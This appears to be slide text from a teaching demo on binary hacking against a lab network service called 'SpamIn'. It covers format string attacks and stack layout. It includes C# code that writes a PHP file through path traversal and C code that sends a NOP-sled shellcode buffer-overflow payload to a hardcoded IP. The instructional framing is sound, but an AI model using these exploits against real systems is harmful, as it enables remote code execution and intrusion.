SPAMIN

Binary Hacking

Tools

• IDA + Hex Rays• hexeditor• WinSCP• Putty• telnet• Visual Studio• Wireshark (Optional)

Do not pirate

• http://www.hex-rays.com/idapro/hallofshame.html

Begin Demo

• SSH into and browse service• netstat –anp• telnet• observe• attempt exploit – optional• reverse engineer• exploit more• patch

printf format string attack

int printf(const char *format, ...);

printf(“%s”, str1);printf(“%s, %x, %x, %x”, str1, x, y, z);

3

“%x %x %x”

1

2

printf(“%x %x %x”,1,2,3);

gets(str1);printf(str1);

%n The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted

C#

TcpClient client = new TcpClient("128.198.60.73", 8008);

StreamWriter streamWriter = new StreamWriter(client.GetStream());

streamWriter.Write("SPAM-IN-SPAM-OUT\n");streamWriter.Write("../public_html/fun.php\n");

streamWriter.Write("<?php phpinfo(); ?>\n");streamWriter.Flush();

format

file contents

filename

512

512

512

0x200

0x200

0x200

0x62C

0xbffff178

…

0xbfffffff

stuff

Gets Shell Code

• http://www.linux-secure.com/endymion/shellcodes/archive/linux-x86-mkdir1.c

NOP

Shell Code

RA

buffer

#include <winsock.h>

int sock; /* Socket descriptor */

struct sockaddr_in mySockAddr; /* server address */

WSADATA wsaData; /* Structure for WinSock setup communication */

if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */

{

fprintf(stderr, "WSAStartup() failed");

exit(1);

}

sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

memset(&mySockAddr, 0, sizeof(mySockAddr));

mySockAddr.sin_family = AF_INET;

mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73");

mySockAddr.sin_port = htons(8008);

connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));

send(sock,pass,17,0);

C# != C

unsigned __int8 isStringLess; // cf@1 unsigned __int8 isStringEqual; // zf@1 signed int v4; // ecx@1 int spamString2; // edi@1 char *userInput1; // esi@1 int result; // eax@6 char v8; // [sp-10h] [bp-648h]@1 char v9; // [sp+0h] [bp-638h]@1 char *v10; // [sp+Ch] [bp-62Ch]@16 int v11; // [sp+10h] [bp-628h]@1 int spamString1; // [sp+14h] [bp-624h]@1 char *v13; // [sp+18h] [bp-620h]@1 __int16 v14; // [sp+1Ch] [bp-61Ch]@1 char format; // [sp+28h] [bp-610h]@1 char filedata; // [sp+228h] [bp-410h]@12 char filename; // [sp+428h] [bp-210h]@9 int v18; // [sp+628h] [bp-10h]@1 FILE *stream; // [sp+62Ch] [bp-Ch]@1

format

file contents

filename

Other Local Function Variable

Other Local Function Variable

512

512

512

0x200

0x200

0x200

0x62C

Save Register (Prologue) ebp

RA

3

Save Register (Prologue) ebp

Save Registers

0xbffffb10

744

…

0xbfffffff

printf parameters

RAprocess message

main

nopshellcode

RA (repeated)

printf

“%x %x %x”

1

2

printf(“%x %x %x”,1,2,3);

• C# attack• fork -- remote gdbserver• gdb ./spamin PID• x /1000w 0xbfffffff – use offset found in printf

attack

• gdbserver demo

int sock; /* Socket descriptor */

struct sockaddr_in mySockAddr; /* Echo server address */

char *pass = "SPAM-IN-SPAM-OUT\n";

char payload [2500];

WSADATA wsaData; /* Structure for WinSock setup communication */

if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */

{

fprintf(stderr, "WSAStartup() failed");

exit(1);

}

sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

memset(&mySockAddr, 0, sizeof(mySockAddr));

mySockAddr.sin_family = AF_INET;

mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73");

mySockAddr.sin_port = htons(8008);

connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));

int nopLength = 300;

int length = 700;

memset(payload, '\x90', nopLength); // Create the nop sled in the payload

memcpy(&payload[nopLength],sc,sizeof(sc)); // Copy the shellcode into payload

for (int j=0; j < 1500; j+= 4) // Copy the RA into the payload

{

int r = nopLength + sizeof(sc) -1;

memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4);

}

payload[length-1] = '\n';

send(sock,pass,17,0);

send(sock, payload, length, 0);

send(sock,pass,17,0);